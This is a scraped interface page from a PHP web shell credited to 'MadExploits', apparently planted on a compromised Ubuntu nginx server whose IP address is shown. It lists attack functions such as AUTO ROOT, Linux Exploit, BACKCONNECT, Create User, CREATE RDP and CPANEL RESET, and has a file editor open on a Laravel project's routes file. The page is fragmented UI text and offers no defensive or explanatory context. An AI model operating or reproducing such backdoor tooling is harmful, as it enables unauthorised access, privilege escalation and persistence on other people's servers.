Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
honeycomb /
src /
routes /
[ HOME SHELL ]
Name
Size
Permission
Action
api.php
521
B
-rwxrwxr-x
auth.php
2.52
KB
-rwxrwxr-x
channels.php
558
B
-rwxrwxr-x
console.php
592
B
-rwxrwxr-x
web.php
3.25
KB
-rwxrwxr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : api.php
<?php use Illuminate\Http\Request; use Illuminate\Support\Facades\Route; Route::group(['middleware'=>'api'], function (){ Route::get('/getMainMenu',[\App\Http\Controllers\MenuController::class, 'getMainMenu']); Route::get('/getChildMenu/{id}',[\App\Http\Controllers\MenuController::class, 'getChildMenu']); Route::get('/getPageList/{menu_id}',[\App\Http\Controllers\PageController::class, 'getPageList']); Route::get('/getPage/{slug}',[\App\Http\Controllers\PageController::class, 'getPageBySlug']); });
Close